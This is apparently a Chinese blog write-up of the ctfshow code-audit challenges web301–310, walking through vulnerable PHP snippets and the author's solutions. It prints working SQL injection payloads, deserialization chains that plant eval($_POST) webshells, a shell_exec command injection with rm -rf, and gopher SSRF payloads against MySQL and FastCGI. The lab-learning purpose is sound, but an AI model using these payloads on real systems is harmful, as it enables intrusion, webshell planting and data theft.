ctfshow代码审计

已于 2022-12-26 20:54:33 修改
阅读量222 收藏
点赞数
分类专栏: 刷题 文章标签: php 开发语言
于 2022-12-26 20:53:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63928796/article/details/128449226
版权

web301

Seay审一下啥也没有,直接上手看

在checklogin.php中

$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);

sql语句中,username没有过滤而产生的sql注入漏洞

userid=1'union select 1#&userpwd=1

登录成功拿到flag

web302

和上题有一点不一样,在

fun.php

<?php
function sds_decode($str){
	return md5(md5($str.md5(base64_encode("sds")))."sds");
}
?>

进行了加密,我们也将传入的str加密即可

exp

<?php
$str = 1;
echo md5(md5($str.md5(base64_encode("sds")))."sds");


#d9c77c4e454869d5d8da3b4be79694d3

在checklogin.php

$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);

和上一题相同

sql语句中,username没有过滤而产生的sql注入漏洞

userid=1'union select d9c77c4e454869d5d8da3b4be79694d3#&userpwd=1

web303

这题限制了username的长度,无法sql注入了

但在dptadd.php中

	$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";

有多个参数可控,且无过滤,可以进行sql注入,但要先登录,在数据库中

INSERT INTO `sds_user` VALUES ('1', 'admin', '27151b7b1ad51a38ea66b1529cde5ee4');

发现了admin和加密后的密码,盲猜是admin,

弱口令登录后,访问dptadd.php,在dptadd.php中可以看出每个字段值都可控,所以我们可以在随便一个地方构造,这样它就会把我们想要查的东西插入到表中,最后我们再在dpt.php查看就可以了

爆表:
dpt_name=5',sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#

字段:
dpt_name=5',sds_address=(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')#

flag:
dpt_name=5',sds_address=(select flag from sds_fl9g)#

web 304

和上题步骤一样

web305

在fun.php

<?php
function sds_decode($str){
	return md5(md5($str.md5(base64_encode("sds")))."sds");
}
function sds_waf($str){
	if(preg_match('/\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\"|\,|\.|\?|\/|\\\|\<|\>/', $str)){
		return false;
	}else{
		return true;
	}
}
?>

过滤的很死。应该无法sql注入了

在class.php中

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-17 13:20:37
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-17 13:33:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


class user{
	public $username;
	public $password;
	public function __construct($u,$p){
		$this->username=$u;
		$this->password=$p;
	}
	public function __destruct(){
		file_put_contents($this->username, $this->password);
	}
}

file_put_contents函数是将字符写入文件中

假如我们把username=<?php @eval(POST_['a']); ?>,再吧password=1.php,就把一句话木马写入1.php中,

再去找反序列化的地方

在checklogin.php中

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-06rqDZpj-1672058936329)(代码审计.assets/image-20221226160934502.png)]

if(isset($user_cookie)){
	$user = unserialize($user_cookie);
}

exp:

<?php

class user{
    public $username;
    public $password;
    public function __construct(){
        $this->username='1.php';
        $this->password='<?php eval($_POST[1]);phpinfo();?>';
    }
}
$a=new user();
echo urlencode(serialize($a));


O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A34%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3Bphpinfo%28%29%3B%3F%3E%22%3B%7D

cookie:user=O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A34%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3Bphpinfo%28%29%3B%3F%3E%22%3B%7D

访问1.php,出现phpinfo()上传成功

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hMboIIV6-1672058936331)(代码审计.assets/image-20221226164112539.png)]

用蚁剑练剑数据库,就可以找到flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AnpyZ4u8-1672058936332)(代码审计.assets/image-20221226164220663.png)]

web306

在class.php中

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Caz5rwQT-1672058936333)(代码审计.assets/image-20221226183813065.png)]

在close()方法中有file_put_contents函数可以利用,再去找可以触发close()方法的

在dao.php中

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ix0BmNz1-1672058936333)(代码审计.assets/image-20221226183929340.png)]

可以通过触发__destruct()来触发close(),反序列化中可以自动触发__destruct()

在index.php中

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1W0C8U1e-1672058936334)(代码审计.assets/image-20221226184142214.png)]

有unserialize()函数进行反序列化

exp

<?php

class dao{
    private $conn;
    public function __construct(){
        $this->conn=new log();
    }
}

class log{
    public $title='1.php';
    public $info='<?php eval($_POST[1]);?>';
}
echo base64_encode(serialize(new dao()));

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Q0Ofugj1-1672058936335)(代码审计.assets/image-20221226193255795.png)]

web307

Seay扫一下,在dao.php发现了shell_exec

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-N3rbqyKT-1672058936335)(代码审计.assets/image-20221226200842160.png)]

shell_exec函数可以执行脚本

shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');

可以改成

rm -rf ./;echo  "<?php eval(\$_POST[1]);?>" >a.php; /*

管道符前面报错后会执行后面的命令,所以我们吧$this->config->cache_dir改成我们想要的命令,

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kleskPNe-1672058936336)(代码审计.assets/image-20221226201227500.png)]

两个类再去找反序列化点

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-y8rXRuCw-1672058936337)(代码审计.assets/image-20221226201434990.png)]

exp

<?php
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}

class config{
    public $cache_dir = ';echo  "<?php eval(\$_POST[1]);?>" >a.php;';
}

echo base64_encode(serialize(new dao()));

访问a.php命令执行即可

web308

在fun.php中有个ssrf

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BPoS0PYX-1672058936337)(代码审计.assets/image-20221226203254772.png)]

再去找哪里调用了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-21saEb8n-1672058936338)(代码审计.assets/image-20221226203329944.png)]

继续找到反序列化的利用点

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-O3n80J5u-1672058936338)(代码审计.assets/image-20221226203412604.png)]

用gopherus.py生成payload

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hVzFt3BM-1672058936339)(代码审计.assets/image-20221226204054884.png)]

exp

<?php
class dao{
    private $config;
    public function __construct(){
        $this->config = new config();
    }
}

class config{
    public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%22%01%00%00%00%01';
}

echo base64_encode(serialize(new dao()));

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0SarkuZJ-1672058936339)(代码审计.assets/image-20221226204250077.png)]

传入获取flag

web309

和上一题差不多但打的是fastcgi,稍微改一下exp即可

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iKJsOIwn-1672058936340)(代码审计.assets/image-20221226204455353.png)]

exp

<?php
class dao{
    private $config;
    public function __construct(){
        $this->config = new config();
    }
}

class config{
    public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27cat%20f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}

echo base64_encode(serialize(new dao()));

web310

读配置文件

<?php
class config{
	public $update_url = 'file:///etc/nginx/nginx.conf';
}
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}

}
$a=new dao();
echo (base64_encode(serialize($a)));
?>

访问4476端口

<?php
class config{
	public $update_url = 'http://127.0.0.1:4476';
}
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}

}
$a=new dao();
echo (base64_encode(serialize($a)));
?>

找找就可以找到flag

Msaerati
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow代码审计
qq_61768489的博客
01-26 1264
4476端口对应着 /var/flag目录,有个index.html文件,这和我们连上蚁剑后知道的一样。给的源码还是308,还是用fastcgi,这次直接写shell进去,因为flag文件不知道在哪。可以利用file_put_contents来写shell ,需要调用close()方法。思路与上题一样,不过是输入的password经过了一点加密,构造一下就行。sql注入写shell也是没问题的,因为sql语句依旧是正常执行了。似乎没有调用,与上题一样,换一种方式,有报错信息就试试报错注入。
ctfshow web入门代码审计 web301-305
m0_62207170的博客
04-20 452
ctfshow web入门代码审计 web301-305
ctf_show笔记篇(web入门---代码审计
最新发布
whale_waves的博客
03-13 1107
在dao.php文件找到了当最后销毁序列化时调用close(__destruct魔法函数), 这里就要用到__construct魔法函数, 当执行new实例化的时候就会调用, 一会儿再去找哪里实例化了dao这个类, 将$this->config=new config()修改为$this->conn->=apt()这里$this->config->cache_dir指向了config类里的cache_dir变量, 刚好又是个public公共便变量可以修改。这里的'问好'像下面一样加密一下。
CTFshow—代码审计 web301-310
cht6667的博客
02-23 980
CTFshow代码审计部分个人做题记录
ctfshow web入门(代码审计)
qq_53263789的博客
07-19 336
ctfshow
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
ctfshow 代码审计 web301~310
shinygod的博客
09-24 793
知识点:SSRF--gopher协议打FastCGI(PHP-FPM的未授权访问漏洞),file伪协议,nginx配置文件
CTFshow 代码审计
starttv的博客
11-30 890
分析源码在dptadd.php有注入点,无过滤,但要求先登录,尝试弱口令admin,admin登录成功。所以我写入一个php查数据库的文件,可以正常查询。发现多了个class.php,并且在checklogin.php有反序列入口,到这里思路就清晰了。​协议的延时可以探测端口是否开放,开放的端口会保持连接,而未开放的端口会直接返回页面结果,经探测后。写入一句话木马后用蚁剑连接查数据库即可,数据库的用户名和密码可以在conn.php中找到。在index.php和login.php中发现反序列化入口。
ctfshow 代码审计专题
akxnxbshai的博客
02-21 372
重新过一遍,写了个wp。
Ctfshow web入门 代码审计篇 web301-web310 详细题解 全
Jay17的博客
09-21 1566
Ctfshow web入门 代码审计篇 web301-web310 详细题解 全
CTFshow——代码审计
D.MIND 的博客
04-07 1471
文章目录web301——SQL注入web301——SQL注入web303——报错注入web304——报错注入web305——web306——web307—— web301——SQL注入 将源码下载下来。主要看checklogin.php: $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=
PHP代码审计】ctfshow web入门 php特性 93-104
m0_63563528的博客
08-01 685
假设 “1.php” 是在 $allow 数组中,则会将 <?当访问 “1.php” 时,恶意代码 system(“tac flag36d.php”) 将会被执行,显示名为 “flag36d.php” 的文件内容的逆向(从最后一行到第一行)。正则表达式的含义是任意字符,后面跟着"p",后面跟着任意字符,后面跟着"h",后面再跟着任意字符,最后跟着"p",而。
PHP代码审计 -- 以ctfshow php特性 93-104为例
qq_44640313的博客
08-01 189
ctfshow php特性 93-104
ctfshow 代码审计
qq_45951598的博客
05-21 703
web301 这里看了一下文件发现,就一些登入页面文件 然后简单看了一下文件,定位到checklogin.php这个文件,做个简单的代码审计 <?php error_reporting(0); session_start(); require 'conn.php'; $_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:""; //判断当前传入的userid是否为空,空的话返回为空 $_POST['userpwd']=!empty(

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值